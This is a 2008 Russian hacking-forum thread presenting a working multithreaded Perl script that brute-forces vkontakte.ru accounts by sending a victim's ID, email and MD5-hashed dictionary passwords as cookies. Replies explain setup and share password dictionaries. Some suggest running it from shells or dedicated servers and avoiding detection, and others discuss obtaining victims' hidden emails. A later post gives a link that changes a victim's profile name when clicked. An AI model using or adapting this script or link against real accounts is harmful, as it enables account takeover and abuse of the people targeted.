Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   vkontakte brutforce (https://forum.antichat.xyz/showthread.php?t=60546)

baltazar 31.01.2008 17:52

vkontakte brutforce
 
Код:

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = 'passl.txt';                #словарь паролей
$id = 111111;                #id цели
$mail = 'mail%40mail.com';        #мыло, вместо @ вписать %40
$threads = 4;                #количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
        "Host: vkontakte.ru\r\n".
            "Accept: */*\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "User-Agent: Mozillo\r\n".
            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
        my (@mas);
        while (<pass>){
        push @mas, $_;
        last if (@mas == 400);
        }
        chomp @mas;
        return @mas;
}

Цитата:

$dic = 'passl.txt'; #словарь паролей
$id = 111111; #id цели
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков

S1ash 02.02.2008 01:39

Супер.. ништяк.. скорость отпад.. даже на неполных 256 кб/с
респект!

GreenTiger 04.02.2008 23:21

Gui версии уже как 2 месяца... а вы перл юзаете

Talisman 04.02.2008 23:30

Цитата:

Сообщение от GreenTiger
Gui версии уже как 2 месяца... а вы перл юзаете

а нах гуи под консолью, темболее когда сеть дедиков брутит?

CyberTm 05.02.2008 01:09

Цитата:

Сообщение от GreenTiger
Gui версии уже как 2 месяца... а вы перл юзаете

Выложи сюда ссылки пож

E}I{uk 06.02.2008 21:38

А как это все юзать?

Pir4tt 06.02.2008 22:03

Установи Active Perl если для окошек (ну или серв какой нить если оч хоцца), сохрани текс кода в файл Brut.pl, и запусти, отредактировав входные данные (мыло/йд/файлспассами), как вариант залей на шелл..

Digital Cat 06.02.2008 23:12

С активперла с проксями может не сработать вроде... О_о Если я ошиблась, поправьте) Именно этот плоит не юзала, каюсь)

diehard 07.02.2008 03:11

Просто ради теста прогоняю со своей тачки без проксей: один пароль сдался через 2 минуты, другой минут 20 брутился, пока в ответку Outpost не сообщил:

06.02.2008 23:37:58 Сканирование портов 195.190.105.235 TCP (4084, 4082, 4083, 4080, 4074, 4075)
06.02.2008 23:37:58 Rst атака 195.190.105.235 -> 195.190.105.235

195.190.105.235 = vkontakte.ru :-)))
Вот так вот, vkontakte.ru практикует DOS-атаки своих пользователей? А вдруг я свой забытый пароль перебираю? Беспредельщики!
Короче смотрите на палитесь, а то еще забанят.

Grini 07.02.2008 17:24

хм..я у себя в виде теста брутил..и ниче мне на мыло не пришло..хм

Grini 07.02.2008 17:35

кстати да))в виде теста в строчке "$id = 111111" сотрите 5 едениц..клин клином вышибают :)

diehard 07.02.2008 17:39

Grini
А тебе и не должно ничего на мыло приходить.

Grini 07.02.2008 17:43

а зачем там мыло писать надо?
И вытикающий вопрос)Где появляется пасс?

ReVOLVeR 07.02.2008 18:25

читай скрипт
good, '>>good.txt');

следовательно в фаиле good.txt))

Grini 07.02.2008 18:43

почему же он мой пароль не распознает?)я на себе тестю,а он пробегает мой пароль,пишет ок и все)где этот гуд.ТиксТ появляется?в папке с самим файликом как я понимаю должен,но его нет :(
кстати скрипт русские буквы,запятые распознает?может причина в этом?

Pir4tt 07.02.2008 22:28

Цитата:

$dic = 'passl.txt'; #словарь паролей Список с паролями которые надо попробовать пробрутить
$id = 111111; #id цели ID того акка который брутим
$mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 Мыло на которое зареган акк который брутим
$threads = 4; #количество потоков
читаем первый пост внимательнее

diehard 07.02.2008 23:05

Grini

Исходник почитай хотя бы, прежде чем запускать.
Мыло на вконтакте.ру используется в качестве логина. Скрипт посылает серверу запрос подсовывая левые куки : [ид, мыло, мд5(пароля)]. Когда сервер даёт добро, скрипт завершает работу и пишет отчет в good.txt
Видимо ты даешь неправильные данные (ид, мыло или пароль)

Grini 10.02.2008 20:31

спасибо,разобрался :)

Isis 11.02.2008 02:28

Упс

Hellsp@wn 11.02.2008 03:27

ужс какой :)

http://img258.imageshack.us/img258/7029/sshot1lb0.jpg

гейт: www.poncher.110mb.com/my/rtest/e.php

freddi 11.02.2008 12:34

Цитата:

Сообщение от Isis
Егоакк - Toolz for vkontakte.ru

это шутка, а не тулза для вконтакте.

brasco2k 13.02.2008 21:23

ВАУУ так бы аси быстро брутились))

LEE_ROY 14.02.2008 07:29

доходит до правельного пасса, и виснет с загрузкой проца на 50% :)

wda 18.02.2008 18:54

Сенкс за скрипт, рахзобрался - вроде пашет, но проблема с узнаванием мыл по известному Ид так понял открыта?

Grini 18.02.2008 20:26

Wda,хороший вопрос :) это единственная заноза какая останавливает,так как почти все скрывают реальный почтовый ящик

SoulJKeee 24.02.2008 08:47

подкиньте словарик с пасами :>

SoulJKeee 24.02.2008 09:04

словарик надыбал , ничо млять не пахает =<

neon_fx 24.02.2008 09:42

http://neon-fx-0.land.ru/LanguagePasslist.rar

neon_fx 24.02.2008 09:53

http://neon-fx-0.land.ru/bigdict.rar

Macro 24.02.2008 10:40

Отличная ошибка 404 :)

RobinGood 26.02.2008 13:19

HELP !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Не получается запустить скрипт, я уже 10000 попыток сделал, либо пустое DOS окно, либо оно открывается и сразу закрывается. Я понимаю что я где то туплю, (всё что было написано сделал, id, мыло и словари) расскажите поподробней последовательность действий, очень надо !!!!!!!!!

mazaxaka 26.02.2008 19:46

Цитата:

Сообщение от RobinGood
HELP !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Не получается запустить скрипт, я уже 10000 попыток сделал, либо пустое DOS окно, либо оно открывается и сразу закрывается. Я понимаю что я где то туплю, (всё что было написано сделал, id, мыло и словари) расскажите поподробней последовательность действий, очень надо !!!!!!!!!

а ты перл поставил?

mazaxaka 26.02.2008 20:01

Люди подскажите что за борода , к своему аку даже пас енмогу подобрать пишу пас в конце в начале и тд а прогоняет все и паса в гудс нету

ReVOLVeR 26.02.2008 20:52

скрипт рабочий .... должно всё быть....

проверь #мыло, вместо @ вписать %40

словари лежат в одной папке со скриптом

Стоит ли своё значение $id = 111111;#id цели

mazaxaka 26.02.2008 23:05

вместо 40% вписал собаку и все гуд теперь:)

RobinGood 26.02.2008 23:37

Спасибо, получилось :)
Ещё один вопрос: сейчас попробовал на своём id (заложил свой пароль в конец словаря) и при переборе пару раз DOS окно зависало намертво, приходилось начинать с начала.
Подскажите что за хрень ?

hellforces 28.02.2008 20:41

чет у мну просто черное окно....какую версию perl пользуйте?

freddi 28.02.2008 23:05

у меня 5.10.0.1001, все работает.

hellforces 28.02.2008 23:29

скачал такой же, но все равно ,просто черный экран )

вроде все верно ввожу.....

кстати вчера работал прикол, седня его уже пофиксили

http://vkontakte.ru/profileEdit.php?page=education&time=welcome&subm=1 &first_name=%C9%E0&last_name=%CA%F0%E5%E2%E5%E4%EA %EE

если нажать по ссылке, то менялся никнейм на "Йа креведко" :)

BitHack 28.02.2008 23:42

у меня тоже все работает (=
всё гуд


Время: 18:56